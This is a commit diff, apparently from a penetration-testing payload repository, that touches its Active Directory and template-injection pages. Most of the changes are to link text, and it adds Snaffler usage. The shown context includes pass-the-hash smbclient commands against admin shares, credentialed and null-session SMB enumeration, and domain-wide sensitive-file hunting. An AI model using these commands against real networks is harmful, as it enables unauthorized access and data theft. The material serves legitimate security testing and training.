Remove deadlink

This commit is contained in:
Swissky 2022-10-21 12:16:32 +02:00
parent 1b037a9c64
commit 8df30de938
2 changed files with 20 additions and 4 deletions
Methodology and Resources
Server Side Template Injection

View File

@ -848,7 +848,7 @@ Automated exploitation:
> Some shares can be accessible without authentication, explore them to find some juicy files > Some shares can be accessible without authentication, explore them to find some juicy files
* [smbmap](https://github.com/ShawnDEvans/smbmap) * [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap)
```powershell ```powershell
smbmap -H 10.10.10.10 # null session smbmap -H 10.10.10.10 # null session
smbmap -H 10.10.10.10 -R # recursive listing smbmap -H 10.10.10.10 -R # recursive listing
@ -856,7 +856,7 @@ Automated exploitation:
smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
``` ```
* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) * [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
```powershell ```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
@ -866,7 +866,7 @@ Automated exploitation:
put # replace a file put # replace a file
``` ```
* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket) * [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
```powershell ```powershell
smbclient -I 10.10.10.100 -L ACTIVE -N -U "" smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
Sharename Type Comment Sharename Type Comment
@ -896,6 +896,22 @@ Automated exploitation:
smb: \> mget * smb: \> mget *
``` ```
* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler)
```ps1
snaffler.exe -s - snaffler.log
# Snaffle all the computers in the domain
./Snaffler.exe -d domain.local -c <DC> -s
# Snaffle specific computers
./Snaffler.exe -n computer1,computer2 -s
# Snaffle a specific directory
./Snaffler.exe -i C:\ -s
```
### SCF and URL file attack against writeable share ### SCF and URL file attack against writeable share
Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
@ -4032,3 +4048,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) * [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) * [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) * [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)

View File

@ -1085,7 +1085,6 @@ layout template:
## References ## References
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)